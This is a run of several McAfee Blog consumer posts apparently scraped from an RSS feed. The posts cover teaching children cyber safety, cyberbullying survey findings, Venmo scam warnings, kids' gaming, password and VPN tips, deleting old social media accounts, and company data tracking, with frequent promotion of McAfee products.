Even though everyone is in a frenzied state, now is a great time to slow down and discuss important topics that may arise during the school year. Parents and guardians know their children are tech savvy, just by looking at their thumbs fly across keyboards; however, that doesn’t necessarily mean that they’re cyber-savvy. 

To make sure we’re all on the same page, here are our definitions of tech savvy and cyber savvy: 

  • Tech savvy. Digital natives (millennials, Gen Z, and now Generation Alpha) often develop their tech savviness at a young age. For example, using touchscreens, sending electronic correspondences, and troubleshooting simple technical inconveniences and glitches are like second nature because they’ve been practicing it for so long, and often every day. 
  • Cyber savvy. Cyber savviness extends beyond knowing how to use connected devices. It means knowing how to use them safely and how to intelligently dodge online hazards, know the best ways to protect devices from cybercriminals, how to guard online information, and how to spot the signs that a device or information may be compromised. 

According to McAfee research, children cited that their parents are best suited to teach them about being safe online when compared to their teachers and online resources. Here are common scenarios your child, tween, or teen will likely encounter during the school year, plus some tips and tools you can share to make sure they are safe online. 

Phishing 

It’s now common practice for school systems to communicate with students and their guardians over email, whether that’s through a school-issued email address or a personal one. Your student should know that phishers often impersonate institutions with authority, such as the IRS, banks, and in their case, a school. Put your children on alert to the most common signs of a cybercriminal phishing for valuable personally identifiable information (PII). These signs include: 

  • Typos or poor grammar 
  • Severe consequences for seemingly insignificant reasons 
  • Requests for a response in a very short timeframe 
  • Asking for information the school system should already have or for information they shouldn’t need. For example, schools have a record of their students’ Social Security Numbers, full names, and addresses, but they would never need to know account passwords. 

If your child ever receives a suspicious-looking or -sounding email, they should start an entirely new email chain with the supposed sender and confirm that they sent the message. Do not reply to the suspicious email and don’t click on any links within the message.  

An excellent nugget of wisdom you can impart is the following: Never divulge your Social Security Number over online channels and never give out passwords. If someone needs your SSN for official purposes, they can follow up in a method other than email. And no one ever needs to know your password. 

Social Media Engineering 

With a return to the school year routine comes a flood of back-to-school social media posts and catching up electronically with friends. If your child owns a social media profile (or several!), alert them to the various social media engineering tactics that are common to each platform. Similar to phishing schemes, social media scams are usually “time sensitive” and attempt to inspire strong emotions in readers, whether that’s excitement, fear, sadness, or anger. 

Alert your child that not everything they read on social media is true. Photos can be doctored and stories can be fabricated in order to prompt people to click on links to “donate” or “sign a petition.” You don’t have to discourage your child from taking a stand for causes they believe in; rather, urge them to follow up through official channels. For instance, if they see a social media post about contributing to save the rainforest, instead of donating through the post, contact a well-known organization, such as the World Wildlife Fund and inquire how to make a difference. 

School Device and BYOD Policies 

More and more school systems are entrusting school-issued connected devices to students to use in the classroom and to bring home. Other districts have BYOD (or bring your own device) policies where students can use personal family devices for school activities. In either case, device security is key to keeping their information safe and maintaining the integrity of the school system’s network. Families don’t want to be the weakest link in the school system and are responsible for a town-wide education network breach. 

Here are three ways to protect any device connected to the school network: 

  1. Lock screen protection. Biometric security measures (like facial recognition or fingerprint scanning) and passcode-locked devices are key in the case of lost or stolen devices.  
  2. Password managers. It can be a lot to ask of an adult to remember all their passwords. But expecting a young person to memorize unique and complicated passwords to all their accounts could lead to weak, reused passwords or poor password protection methods, such as writing them down. A password manager, like McAfee True Key, makes it so you only have to remember one password ever again! The software protects the rest. 
  3. VPNs. VPNs (virtual private networks) are key to protecting your network when you’re surfing on free public Wi-Fi or on networks where you’re unsure of the extent of their protection. McAfee Secure VPN protects your network with bank-grade encryption, is fast and easy to use, and never tracks your online movements so you can be confident in your security and privacy. 

Gear Up for a Safe School Year 

These conversations are great to start at the dinner table or on long, boring car rides where you’re most likely to get your child’s undivided attention. Don’t focus so much on the fearful consequences or punishment that could result from poor cyberhabits. Instead, emphasize how easy these steps and tools are to use, so it would be silly not to follow or use them. 

The post Back to School: Tech Savvy vs. Cyber Savvy appeared first on McAfee Blog.

]]>
More Dangers of Cyberbullying Emerge—Our Latest Connected Family Report https://www.mcafee.com/blogs/family-safety/more-dangers-of-cyberbullying-emerge-our-latest-connected-family-report/ Wed, 10 Aug 2022 12:40:26 +0000 https://www.mcafee.com/blogs/?p=156632

Earlier this year, our global Connected Family Study revealed the online habits of parents and their children. What we found...

The post More Dangers of Cyberbullying Emerge—Our Latest Connected Family Report appeared first on McAfee Blog.

]]>

Earlier this year, our global Connected Family Study revealed the online habits of parents and their children. What we found called for a closer look. 

One finding that leaped out, in particular, is—cyberbullying occurs far more often than parents think. And in many cases, children are keeping it from their parents.  

Now with our follow-on research, we set out to answer many of the questions families have about cyberbullying. Where it happens most, who’s most affected, and are children cyberbullying others without even knowing it? 

Our report, “Hidden in Plain Sight: More Dangers of Cyberbullying Emerge,” provides insights into these questions and several more. We’ll cover the top findings here in this blog, while you can get the full story by downloading the report here. 

Worries about cyberbullying have only grown in 2022—and they appear justified. 

Even as stay-at-home mandates in 2020 and 2021 saw children exposed to more cyberbullying while they spent more time online, our ten-country survey found that concerns about cyberbullying in 2022 are even higher today: 

  • 60% of children said they were more worried this year about cyberbullying compared to last year.    
  • 74% of parents are more worried this year about their child being cyberbullied than last. 

And just as the level of concern is high, the findings show us why. Families reported alarming rates of racially motivated cyberbullying, along with high rates of attacks on the major social media and messaging platforms.  

Additionally, children shared insights into who’s doing the bullying (it’s largely people who know them) and more than half are the ones doing the bullying—and they don’t even realize it. 

Further findings include: 

  • Cyberbullies are aiming racist attacks at children as young as ten. 
  • Millions of children have deleted their social media accounts to avoid cyberbullying.  
  • Despite its efforts, Meta’s social media and messaging platforms have the highest level of cyberbullying. 
  • A growing number of parents turn to therapy to help their children deal with cyberbullying. 

Regional and cultural backdrops give cyberbullying a distinctive feel. 

Our research further revealed how the face of cyberbullying takes on different form around the globe. From nation to nation, the influences of polarized politics, racial relations, and different traditions in parent-child relationships shape and re-shape the forms of cyberbullying that children see. 

Each of our ten nations surveyed set themselves apart with trends of their own, some of them including: 

  • United States: Despite some of the most engaged parents, children in the U.S. experience among the highest rates of cyberbullying in its most extreme forms, such as sexual harassment, compromised privacy, and personal attacks.  
  • India: Cyberbullying reaches alarming highs as more than 1 in 3 kids face cyber racism, sexual harassment, and threats of physical harm as early as at the age of 10—making India the #1 nation for reported cyberbullying in the world.  
  • Canada: Canadian children experience cyberbullying largely on par with global rates—yet their parents act on it less often than other parents. Meanwhile, Canadian children are the least likely to seek help when it happens to them.  
  • Australia: Australian cyberbullying rates dropped significantly since our last report, yet Snapchat stands out as a primary platform for cyberbullying, more than anywhere else in the world. And of all parents worldwide, Australians feel most strongly that technology companies should do more to protect their children. 

Cyberbullying in 2022: The facts confirm your feelings. 

These new findings reflect the concerns of parents and children alike—cyberbullying remains a pervasive and potentially harmful fact of life online, particularly as racism and other severe forms of cyberbullying take rise.  

Without question, cyberbullying endures as a persistent growing pain that the still relatively young internet has yet to shake. 

The solution is arguably just as complex as the factors that give cyberbullying its shape—cultural, regional, technological, societal, even governmental. Addressing one factor alone won’t curb it. Significantly curtailing cyberbullying for an internet that’s far safer than it is today requires addressing those factors in concert.   

While we recognize that tall order for what it is, and as a leader in online protection, we remain committed to it.   

With these findings, and continued research to come, our aim is to further an understanding of cyberbullying for all—whether that’s educators, technology innovators, policymakers, and of course parents. With this understanding, programs, platforms, and legislation can put protections in place that still allow for companies to innovate and create platforms that people love to use. Safely and securely. 

The post More Dangers of Cyberbullying Emerge—Our Latest Connected Family Report appeared first on McAfee Blog.

]]>
How to Identify and Protect Yourself From Venmo Scams and Other Cash App Scams https://www.mcafee.com/blogs/internet-security/how-to-identify-and-protect-yourself-from-venmo-scams-and-other-cash-app-scams/ Fri, 05 Aug 2022 16:26:10 +0000 https://www.mcafee.com/blogs/?p=159875

Have you ever been on the receiving end of a scam or heard of someone whose bank account was emptied...

The post How to Identify and Protect Yourself From Venmo Scams and Other Cash App Scams appeared first on McAfee Blog.

]]>

Have you ever been on the receiving end of a scam or heard of someone whose bank account was emptied by fraudsters 

Unfortunately, these examples are becoming increasingly common. The Better Business Bureau (BBB) shared that they receive about 1,000 scam complaints daily from cash app users. As the number of cash app users increased over the last few years, so did the number of fraudsters on payment apps like Venmo and PayPal. As a result, even the most alert people have found themselves prey to smooth-talking fraudsters. 

This article highlights common themes of cash app scams and explains how to protect your financial and personal information from scammers online. Stay tuned to learn more. 

Tips to avoid Venmo and Cash App scams

With the number of scams rising, it’s important to be more aware and cautious. So, what can you do to protect yourself from being scammed? 

Here are four essential safety tips to avoid some common Venmo scams: 

  • Never share private details like your Social Security number, bank account information, or debit card or credit card number with anyone online — even if they claim to be from the Venmo customer service team. Attackers can use the stolen credit card information to make unwanted transactions from your account. 
  • Do not send money to strangers online, no matter what they tell you. And never do business with strangers through the Venmo app. 
  • Never click on links in emails or texts supposedly sent by Venmo. Venmo mail is always sent via their official mail ID from their website: venmo.com. In addition, Venmo will never address you as “Dear User” or “Dear Venmo User” — they will always address you by your full name or business name. 
  • Turn the private setting on Venmo on so strangers can’t view your Venmo transaction history. 

Let’s discuss some scam tactics commonly used on money transfer apps like Venmo and how you can quickly recognize and sidestep them. 

The most common Venmo and Cash App scams

Spoofing and phishing scams are practices that trick you into revealing sensitive financial or online information, leading you to lose money and face risk  identity theft. 

Knowing common ways that an online scammer can trick you will help you stay alert. This knowledge might make it easier to recognize a fraudster. 

Let’s talk about a few common scam tactic examples, so you know the red flags to look out for when using cash apps like Venmo. 

Fake reward or cash prize

In this type of scam, a scammer will send you a text message, a notification, or an email with a link telling you that you won a cash prize or trending concert tickets on Venmo. The link generally leads to a page that asks you to sign in or provide information about your Venmo account. For example, the text could say something like, “As a long-time user of Venmo, you have received a $20 gift card from Venmo. Sign in to redeem.” Filling in these details can lead to your Venmo account being hacked. 

Prevent being scammed this way by never sharing your Venmo login information with any person or third-party website. 

A scammer may try to sign in to your Venmo account, requiring them to enter a code sent to your mobile number. They will call you, pretend to be from the Venmo tech support or customer service team, and produce any plausible reason they need you so you’ll share the code you received.  

For example, this phone call may sound like, “Hello, we have noticed some unauthorized transactions on your Venmo account. This can lead to your account being blocked. To authorize the transactions, we need to confirm that you are the real owner of this account. For authentication purposes, we sent a code to your phone. Could you share that code with me, please?” 

When in the middle of a busy work day, this call might not seem like a big deal and you may share the code without suspecting the caller of smishing. However, this code might be part of multi-factor authentication on Venmo and will give the scammer access to your account.  

This can also look a little different. For example, someone who claims to be a Venmo agent might ask you to transfer a sum of money into another account to “verify” your account. 

To avoid being scammed this way, keep in mind that a Venmo agent will never ask for a private code or try to gain access to your account. In addition, Venmo will never ask you to install a third-party app, redirect you to a different sign-in page, or ask you to send money to “verify” an account. 

As a rule of thumb, never share your Venmo verification code with anyone, no matter who they claim to be. 

Offers to make fast cash

This scam has a few names, including pyramid scheme, money circle, or cash wheel. Here, a scammer will persuade you to send them a small amount of money to earn back a larger sum within a short period. This is an easy scam to identify because you have no guarantee that the person will pay you back. However, scammers can be extremely convincing, and you may fall for their words.  

To avoid this mistake on the cash transfer app, don’t ever send money to strangers on Venmo. Remember, if it sounds too good to be true, it’s probably a scam. 

Someone posing as one of your friends

In such a scam, a scammer will attempt to impersonate someone you know. For example, a scammer is impersonating your friend “X.” They use any publicly available information about “X” and create an account using “X’s” name and picture. If “X’s” Venmo account isn’t private, the scammer can access “X’s” transaction history. And, if “X” has transacted with you in the past, the scammer posing as “X” will connect with you and request money. Usually, these requests suggest an urgent need for money. Since you know “X,” you might consider lending them the amount. 

Avoid this scam by being wary of any unusual money requests from someone who looks like a friend. Before accepting the payment request, double-check that the person requesting the money is your friend or a family member. Reach out to your friend outside of Venmo through their phone or a credible social media account to verify that it’s not a fake profile asking you for money. In addition, you should always keep your Venmo friend list and transaction history private to avoid giving scammers access to your data. 

Scams when buying or selling things online 

If you’re selling goods online, a buyer might try to obtain your goods without actually paying for your product. So, they may send you a screenshot of a fake payment to prove they have paid when you haven’t received any money.  

Sometimes, a scammer will send a screenshot showing that they accidentally paid you an extra sum of money, and may ask you to pay the money back. However, their payment was fake, and you will end up paying money from your pocket.  

Another example involves a seller who sends a message that seems like it’s from Venmo. The message might say that the buyer made a payment, but it will only be fully processed once goods are shipped. Again, this is a red flag to watch out for because Venmo doesn’t offer this feature. 

If you’re a buyer online, your seller may convince you to Venmo them the entire payment, and then they may refuse to ship the purchased goods to you. 

To be protected from such scams, avoid selling and buying items using Venmo. If you’re buying from strangers on Venmo, ensure it is a Venmo-approved business account so you have purchase protection for any eligible items covered under the user agreement. 

As a rule, it’s best not to exchange Venmo payments with strangers. Consider blocking the user if you receive an unsolicited payment or a payment request from a stranger on Venmo. 

How to protect yourself from Venmo and Cash App scams

As transactions become increasingly digital, it’s important to educate yourself about the best practices to protect your financial information online. 

Here are some general tips to follow: 

  • Never reveal personal codes, financial details, bank information, private one-time codes, or passwords to anyone online. 
  • Remember that no one from the Venmo team will ever ask for one-time passwords, just like no one from your bank would ask you to reveal private details or codes. 
  • Be aware of current scams so you can recognize one when you see it. 

Online safety should not be taken lightly, and investing in an advanced tool is a good idea to ensure your cybersafety. 

Protect yourself from dangerous threats online with McAfee

If you’re serious about online safety and security, the McAfee+ Protection package is a great investment. This package gives you a premium level of online security, with full protection from things like identity theft. In addition, you get access to antivirus software for unlimited devices, personal data clean-ups, lost wallet protection, and a secure VPN — among other benefits. Sign up today! 

The post How to Identify and Protect Yourself From Venmo Scams and Other Cash App Scams appeared first on McAfee Blog.

]]>
How To Get Your Head Around Your Kids’ Online Gaming Life https://www.mcafee.com/blogs/family-safety/how-to-get-your-head-around-your-kids-online-gaming-life/ Thu, 04 Aug 2022 18:09:04 +0000 https://www.mcafee.com/blogs/?p=157447

Let’s be honest – many of us parents aren’t big fans of gaming. In fact, some of us have probably...

The post How To Get Your Head Around Your Kids’ Online Gaming Life appeared first on McAfee Blog.

]]>

Let’s be honest – many of us parents aren’t big fans of gaming. In fact, some of us have probably even been known to roll our eyes or groan when we think about just how long our kids spend playing online games. But if there is one thing I’ve learned after 25 years of parenting, it’s that taking the time to look at a stressful family situation from the perspective of my children, can be very powerful. In fact, it can almost always fast track finding a mutually agreeable work-around for everyone – and gaming is the perfect example.  

Why Do Our Kids Love Gaming? 

We have all read about how online gaming can provide players with regular hits of dopamine  –  a neurotransmitter in the brain that becomes active when you participate in fun and pleasurable activities. Now I am not disputing this for a moment – I’ve witnessed it firsthand! However, it is important to remember that dopamine increases whenever we do anything enjoyable – pop a square of chocolate in our mouth or watch our favorite sporting team win – not just when we play online games. 

Many online games have cleverly designed built-in reward systems, and many experts believe that it is the combination of dopamine and reward that probably best explains why our kids are such gaming fans. Now, these reward systems are intentionally unpredictable so players are aware they will eventually get a reward, but they have no idea as to when or how often it is coming – so they are compelled to keep playing! Very clever! 

In my opinion, gaming also fills several other needs in our children – the need to belong, to feel competent and be independent. And while we may have had these needs addressed very differently in the 70’s and 80’s – hanging at the bus stop, mastering the Rubix cube and not being helicopter parented, our batch of digital natives will often use gaming as their go-to solution. 

Why You Should See Gaming Through The Eyes of Your Child 

When many of us parents think about our kids’ online gaming, our initial thought is ‘how do we make our kids stop’. But I can you this isn’t the right approach. Online gaming isn’t going anywhere. So, taking the time to see gaming from your child’s perspective and understand why it is such a big part of their life is where you need to focus your energy. I guarantee this will further strengthen your relationship with your child and help you introduce rules that they will better respect. 

Let’s take a moment to channel the great Atticus Finch from To Kill a Mockingbird and focus on his words of inspiration for us all: ‘“You never really understand a person until you consider things from his point of view…until you climb into his skin and walk around in it.” Ah yes – very wise words! 

My Top Tips For A Happy Gaming Family 

So, if you are keen to stop gaming being a negative issue in your family, here are my top tips to help you get it under control and stop it causing family tension: 

1. Change Your Thinking 

If you find yourself thinking ‘how do I get my kids to stop gaming’, you’re barking up the wrong tree. Gaming isn’t going anywhere and as parents, we don’t want to drive an unnecessary wedge between ourselves and our kids. Instead, commit to having an open mind. Think ’Ok, let’s give this gaming thing a go’. 

2. Talk To Your Kids About Their Gaming – With No Tone 

When the time is right, ask your kids what their favourite games are and why. Your aim is to get them talking. You could even do your research in advance and drop in the names of a few popular games to ask them about. ‘My work friend’s son plays Roblox, do you know much about that?’ 

3. Play Along! 

Even if you aren’t that interested, I promise, playing along will open your eyes. You’ll better understand how the game’s reward system works and what it feels like to get a shot of digital dopamine! And most importantly, it will be great for your relationship with your child. By taking the time to play with them, you are showing that you are interested in their life and their hobbies.   

4. Educate Yourself About All Thing Gaming 

When your kids started their social media journey, chances are you spent a little time familiarising yourself with the various platforms they joined. Well, you need to adopt the same approach with their gaming life too. Here are a few areas to focus on:  

  • Check out Discord – an online community where a lot of gamers spend time sharing tips and ‘cheats’. Check out an article I wrote about Discord here. 
  • Suss out Twitch – it’s a live streaming video gaming site where loads of kids spend loads of time watching others game. Yes, this is a thing!  
  • Big time gamers are now considered ‘influencers’. It’s not uncommon for tweens and teens to watch then play on Twitch, subscribe to their YouTube channel, and then follow them on Instagram. They can have a lot of sway! 
  • Do your research on the games your kids play. Having an open mind about gaming doesn’t mean it’s OK for them to play games that are not age-appropriate.  

5. Introduce Fair, Age-Appropriate Rules Around Gaming 

Once you’ve taken the time to understand your child’s gaming life, cleared your mind of any unnecessary negative gaming thoughts and done your research, why not put together a set of family rules for gaming? You may like to consider a family tech agreement and have a separate section for gaming. Or you may prefer to keep it more casual and have the rules written on the fridge or shared in the family group chat. Regardless of what you choose, ensure that you introduce these boundaries when everyone is calm and in a good head space NOT when you’re in the middle of a verbal stoush! 

You could choose to give your children a set amount of time they can use each week on gaming and then let them choose when to use it or you allocate a small time everyday once they’ve completed homework and chores. When my boys were younger, I didn’t allow gaming Monday – Thursday but after school Friday was always quite the gaming fest – a reward for getting through the school week. Do what works for your family!   

There’s no question that this digital parenting gig is complicated. Trying to help your kids find the right balance between embracing the online world and offline world can often feel hard to get right. But if you’re ever in doubt about whether you’re on track when it comes to managing your kids’ gaming, always ask yourself – have I kept an open mind? Have I taken the time to talk to my kids and understand their gaming life? Are the gaming rules fair? And, if you have answered yes, then I have every confidence that you have the right approach to ensuring gaming is a positive part of your family’s life.  

The post How To Get Your Head Around Your Kids’ Online Gaming Life appeared first on McAfee Blog.

]]>
How to Stay One Step Ahead of Hackers https://www.mcafee.com/blogs/tips-tricks/how-to-stay-one-step-ahead-of-hackers/ Wed, 03 Aug 2022 00:23:43 +0000 https://www.mcafee.com/blogs/?p=157238

Whether using the internet for play or work, you want to spend your time online enjoying the peace of mind...

The post How to Stay One Step Ahead of Hackers appeared first on McAfee Blog.

]]>

Whether using the internet for play or work, you want to spend your time online enjoying the peace of mind that comes with having a secure network. 

You don’t want to contend with someone taking your personal data — whether it’s credit card information, passwords, or bank account details — via malware or a data breach on your Android, Windows, or Apple iOS device. 

Fortunately, with some sensible precautions and simple steps, you can use your connected devices productively without worrying about cybercriminals and malicious software. This article explains how to stop hackers from getting access to your sensitive data 

8 ways to protect your identity from hackers

You can take steps to protect your different computing and mobile devices and operating systems. These steps can be divided into technological solutions and the right awareness and information to provide a comforting measure of self-protection. 

It’s like learning karate for self-defense, giving you confidence as you negotiate the wider world (and hoping that you never have to use it). 

Use identity protection software

When it comes to identity protection software, McAfee provides a proven solution with our identity protection and privacy services. The protection includes alerts if your sensitive information is found on the dark web (up to 10 months sooner than other providers), personal data cleanup from sites gathering and selling your information, and an unlimited virtual public network (VPN) service that protects your privacy as you use public Wi-Fi networks. 

You’ll also get up to $1 million in identity theft coverage and hands-on restoration support to help you reclaim your identity.  

Use complex passwords

Simple, obvious passwords and passcodes (like your street address, your birthday, your kids’ or pets’ names, or “1234” or “abcd”) are easy for cybercriminals to crack, giving them unwanted access to your private data. 

The stronger your password, the better your protection. Some best password practices include: 

  • Use a different password for all your online accounts, including your email accounts, social media platforms, and bank accounts. 
  • Create a password that’s at least eight characters long, combining lowercase and uppercase letters, numbers, and symbols. 
  • Don’t use consecutive keystrokes, such as “qwerty.” 
  • Don’t share your passwords with anyone. 
  • Avoid entering your password on unsecured public Wi-Fi, such as at an airport or in a coffee shop. 

Regularly update passwords

It’s important not to be a standing target. Just as you should use different passwords for everything, you should regularly change your passwords. You should do this a few times a year (although some cyber experts say this might not be necessary if you have a long and very complicated password). 

If you have a number of passwords that you update often, it might be worth getting a password manager like McAfee True Key to keep track of them. Not only will you not be faced with remembering all your different passwords or writing them down (also a no-no), but it can also help you create and store unique passwords 

The software uses the strongest encryption algorithms available to protect your passwords, scrambling them so no one else can access them. It’ll also suggest new passwords and automatically log you into your online accounts with just one master password. 

Use multi-factor authentication

Another important line of defense is multi-factor authentication (sometimes known as two-factor authentication). This system uses a password and a second piece of verification — often an SMS message sent to your Android device or iPhone — to authenticate your identity. 

This provides hard-to-beat protection even if a hacker has your password. Besides receiving SMS codes, there are also code-generating apps and physical security keys. 

Learn to spot potential scams

Thinking before you click on an email or text is a very important defense against phishing scams. Your bank won’t send you an email or text notifying you that there’s been suspicious activity on your account.  

Does getting a large refund from your phone company sound too good to be true? It is. Similarly, the Internal Revenue Service (IRS) won’t text to tell you that you owe them money, and princes aren’t going to give you a fortune out of the blue. 

Internet users beware: If you’re not absolutely certain that the text message you received is from a legitimate and trusted source, delete it. You can always contact the business or person directly to confirm that the message is legit. 

Keep device software up to date

Any operating system or app you use is open to malicious cyberattacks. This is why you should keep all your software up to date with the latest versions. Software developers are continually fixing holes in their products and offering cybersecurity patches to make them as safe and hacker-proof as possible. 

Make sure your software, firmware, and security settings are up to date on your home’s Wi-Fi router, as well. You can often change your settings to allow for automatic updates. 

Be cautious when using public Wi-Fi

Sure, who doesn’t like to go to a cafe, library, or hotel lobby to use the free Wi-Fi? But security is often weak in these public networks. If you open your online banking account or access personal information, you may unwittingly be giving a personal invitation to eavesdropping cybercriminals 

This is where the bank-grade level of protection of McAfee Secure VPN comes in, which automatically turns on when you need it and keeps you safe on public Wi-Fi networks. 

Use encryption

Even if your device does get hacked, you can protect vital information on your Windows or macOS system with an encryption program like BitLocker or FileVault. You can protect any hard drive you use, including portable ones and USB keys. 

It’s also a good idea to only shop at encrypted websites marked with the prefix “HTTPS” in their URLs. 

Discover how McAfee keeps you secure online

One of the best ways to surf the web in comfort while keeping hackers at bay is with the comprehensive solutions provided by McAfee Total Protection. 

Your protection includes proactive measures (meaning we’ll guide you to the best choices for prevention), early detection, and expert identity theft support.  

This means you’ll get identity monitoring, up to $1 million in identity theft coverage, lost wallet protection, premium antivirus software, a secure VPN, and personal data removal. In particular, our Personal Data Cleanup service will help find and remove your personal information from data broker websites and people search sites.  

With McAfee, you don’t have to be afraid of hackers. Let us deal with them.  

The post How to Stay One Step Ahead of Hackers appeared first on McAfee Blog.

]]>
How to Delete Old Accounts Containing Personal Information https://www.mcafee.com/blogs/tips-tricks/how-to-delete-old-accounts-containing-personal-information/ Wed, 03 Aug 2022 00:16:38 +0000 https://www.mcafee.com/blogs/?p=157208

Your digital footprint grows with every internet account you make. While your old Tumblr account may be fun for reminiscing,...

The post How to Delete Old Accounts Containing Personal Information appeared first on McAfee Blog.

]]>

Your digital footprint grows with every internet account you make. While your old Tumblr account may be fun for reminiscing, dormant accounts are actually one of the most significant sources of user data on the internet. These accounts can be used by data brokers or third parties to access your personal information.  

To improve your data security, it’s good practice to remove public-facing information by deleting unused accounts. Simply put, having less personal data stored on the internet reduces the risk of theft and/or non-consensual data usage.  

Deleting, canceling, unsubscribing, or removing your account can be a long process, depending on the service. This article will walk you through the simplest ways to delete unwanted accounts from various social media platforms.  

Why you should delete old accounts

Deleting unwanted accounts protects your information and prevents the monetization of your data. Your internet accounts often hold personal information like your name, age, email, or home address. What’s more alarming is that some platforms may even have credit card details, phone numbers, and bank account information. 

When left unattended, internet accounts become vulnerable to being suspended or taken over by the platform. This means that if your accounts are left inactive for too long, you might be handing some or all of your data over to the tech platform.  

For example, even if you believe an old Google account doesn’t have any sensitive information stored, it may be linked to other platforms you use (like Amazon or Google services like Gmail and Google Play). This exposes all of these accounts to several data privacy vulnerabilities.  

Moreover, a recent survey found that 70% of surveyed adults admitted using the same password for more than one service. People who don’t use password managers or reuse passwords are at a greater security risk than others, as multiple accounts can become compromised at once. Whether the platform is now out of service or you are cutting down on your app usage, deleting dormant accounts will minimize security threats and safeguard your data.  

How to permanently delete old accounts, by platform

Every platform has a different process for deleting accounts: Some take only a few clicks to complete and others are a little longer. Companies usually don’t want a user to stop using their services, so account deletion pages are often hidden in a complex web of tabs that you have to navigate.  

In addition, some subscription services might require that you send an email to customer support to close your account. You can go to justdelete.me, an online directory that lets you access direct links to account deletion pages of various web services. 

Remember to download your personal information and data before pulling the plug on your account. Most platforms let you download your data before initiating a deletion request, which saves you from losing important details and files. It is also important to check whether your Google account is used for your YouTube channel or connected to other online accounts. 

To help you get rid of accounts you no longer use, we’ve broken down deleting accounts from some of the most popular social networks. The steps described below are for a desktop browser and may not apply to Android or iOS devices (unless specified).  

How to delete Facebook accounts

Facebook’s user privacy policy enables it to store a large amount of user information, including personal messages, posts, search history, name, age, birthdate, and even metadata from posted photos and videos.  

Follow these simple steps to delete your Facebook account 

  • After logging in from your desktop, click the arrow in the top-right corner  
  • Go to Settings 
  • Click on “Your Facebook Information” tab 
  • Click on “Deactivation and Deletion” 
  • Choose “Delete Account” from menu 
  • Enter password to confirm 
  • Click “Delete Account 

How to delete LinkedIn accounts

LinkedIn collects information on users and uses it for targeted advertising. As a result, it amasses quite a lot of your data, from professional details to personal preferences and even your online behavior trail.  

Follow these simple steps from your desktop to delete your account:  

  • Click on your profile avatar in the top-right corner 
  • Click on “Account Preferences” 
  • Scroll to Account Management and click on “Close Account” 
  • Select a reason for deleting your account 
  • Type password to confirm 

How to delete Twitter accounts

It’s simple to delete your Twitter account, but you’ll have to wait 30 days for your data and tweets to clear. To delete your account, you first need to deactivate it.  

Once you’ve decided to delete your account from the micro-blogging site, follow these steps from your desktop:  

  • From the navigation menu on the left, click on “Settings and Privacy” 
  • Go to “Your Account” tab 
  • Click on “Deactivate your account”  
  • If you don’t choose to reactivate within 30 days, your account will automatically be deleted  

Remember to revoke third-party access to your Twitter account to avoid having your account reactivated in the 30 days following deactivation. 

How to delete Instagram accounts

Since Facebook and Instagram are both owned by Meta, they share a lot of data for targeted advertising. You can adjust the privacy settings of your Instagram account from the mobile app, but you will need to log in from a web browser like Chrome to delete your account.  

To delete your Instagram account 

  • Go to the “Delete your account” page 
  • Choose a reason you’re deleting your account  
  • Enter your password 
  • Click on “Permanently delete your account”  

Your information and data will be permanently deleted after 30 days and you won’t be able to retrieve it. However, completing a deletion process may take up to 90 days.  

How to delete Tumblr accounts

Tumblr has a fairly simple process to delete your account:  

  • Log in to Tumblr from your desktop 
  • Click on the profile icon in the top-right corner  
  • Choose “Settings” 
  • Click on “Delete account”  
  • Enter your email address and password to confirm  
  • Delete account 

How to delete Pinterest accounts

Follow these steps to delete your account from the popular picture-sharing platform:  

  • Select the drop-down menu in the right corner  
  • Click on “Account Management” from the navigation menu  
  • Select “Delete Account 
  • Confirm when asked to receive an email with the final step  
  • In the confirmation email, click on “Yes, close account”  

Pinterest servers continue to store your data after deletion, but your information won’t be visible to other users.  

How to delete email accounts

There are different steps to deleting your email account depending on which email service you use. Backing up email data usually takes more time because of the sheer volume of data a mail account can hold.  

How to delete a Gmail account

Complete the following steps to delete your Google account 

  • Open this URL in your web browser: myaccount.google.com 
  • Select “Data and Privacy” from the menu on the left  
  • Scroll to “Download or delete your data”  
  • Click on “Delete a Google Service”  
  • Click “Delete a service”  
  • Enter your password  
  • Click the trash bin icon next to Gmail  

How to delete a Yahoo account

Here’s what you need to do to delete your Yahoo email account: 

  • Open this URL in your web browser: edit.yahoo.com/config/delete_user  
  • Login with your login credentials  
  • Click on “Continue to delete my account” on the confirmation page  

Deleting your Yahoo account also deletes the linked information from Yahoo’s other services.  

How to delete an Outlook email account

Follow these steps to delete your Microsoft account on Outlook 2010, 2013, or 2016:  

  • Open Outlook on your desktop and select “File” from the upper-left corner  
  • Click on “Account Settings” and choose “Settings” again 
  • Select the account you want to remove and click “Remove” 
  • Confirm by clicking “Yes” 

Keep your identity secure online with McAfee

Leaving old information scattered across the internet makes you susceptible to identity theft. There are multiple ways to keep your identity and data secure online, including McAfee’s Total Protection plan.  

Total Protection lets you choose from multiple affordable subscription models that provide comprehensive security against identity theft and potential data breaches and offers web protection and several related benefits. In addition, having access to 24/7 online security experts and a 30-day money-back guarantee make the Total Protection plan an easy, reliable, and safe choice. You can also have peace of mind with McAfee’s Personal Data Cleanup feature where our teams will work to find your personal information online and assist in removing it.  

The post How to Delete Old Accounts Containing Personal Information appeared first on McAfee Blog.

]]>
What Personal Data Do Companies Track? https://www.mcafee.com/blogs/tips-tricks/what-personal-data-do-companies-track/ Wed, 03 Aug 2022 00:01:44 +0000 https://www.mcafee.com/blogs/?p=157178

Private tech companies gather tremendous amounts of user data. These companies can afford to let you use social media platforms...

The post What Personal Data Do Companies Track? appeared first on McAfee Blog.

]]>

Private tech companies gather tremendous amounts of user data. These companies can afford to let you use social media platforms free of charge because it’s paid for by your data, attention, and time.  

Big tech derives most of its profits by selling your attention to advertisers — a well-known business model. Various documentaries (like Netflix’s “The Social Dilemma”) have attempted to get to the bottom of the complex algorithms that big tech companies employ to mine and analyze user data for the benefit of third-party advertisers.  

This article will help you better understand what information is being collected by tech companies, how it’s being used, and how you can protect your privacy online.   

What information can companies collect?

Tech companies benefit from personal information by being able to provide personalized ads. When you click “yes” at the end of a terms and conditions agreement found on some web pages, you may be allowing the companies to collect the following data:  

  • Personal data. This includes identity-related information like your name, gender, Social Security number, and device-related information like IP address, web browser cookies, and device IDs. Personal data is usually collected to classify users into different demographics based on relevant parameters. This helps advertisers analyze what sections of the audience interact with their ads and what they can do to cater to their target audience.  
  • Usage data. Your interactions with a business’s website, text messages, emails, paid ads, and other online activities are recorded to build an accurate consumer profile. This consumer profile is used to determine and predict what kind of content (including ads) you are more likely to interact with and for how long.  
  • Behavioral data. Purchase histories, repeated actions, time spent, movement and navigation on the platform, and other types of qualitative data are covered under behavioral data. This helps platforms determine your “favorite” purchases or interactions so they can suggest other similar content/products.  
